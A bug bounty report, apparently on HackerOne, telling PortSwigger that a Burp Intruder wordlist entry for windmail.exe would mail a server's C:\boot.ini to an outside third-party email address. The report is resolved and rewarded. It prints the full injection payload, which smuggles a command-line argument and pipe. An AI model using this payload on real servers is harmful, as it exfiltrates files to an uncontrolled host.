cgi scripts wordlist entry for windmail.exe has payload that sends arbitrary file read result to third-party
Low
P
PortSwigger Web Security
Submitted None
Actions:
Reported by
floyd
Vulnerability Details
Technical details and impact analysis
1. Get to your basement, look for that floppy disc copy of windmail.exe
2. Install windmail.exe on a Windows 98 server (good luck with that)
3. Run Burp's Intruder payload list `CGI scripts` against the folder `/cgi-bin/` where you installed that nifty windmail.exe
4. Burp will send the following payload from the wordlist: `WINDMAIL.EXE?%20-n%20c:\boot.ini%[email protected]%20|%20dir%20c:\\`
5. Due to the payload, windmail.exe will send the C:\boot.ini file to the email address [email protected] according to https://seclists.org/bugtraq/2000/Mar/322
6. hax0r.com is currently up for sale: http://hax0r.com
If you are going to argue that nobody is running windmail.exe in 2024, why is that entry still in the wordlist? :D
Although that's really what happens, don't take this report too serious ;) . Am I the only person in the last 20 years who really went through the wordlist manually? But I would still change that one entry.
## Impact
Burp sends the not-very-confidential file C:\boot.ini of an exploited server to the e-mail address [email protected]
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$200.00
Submitted
Weakness
Information Disclosure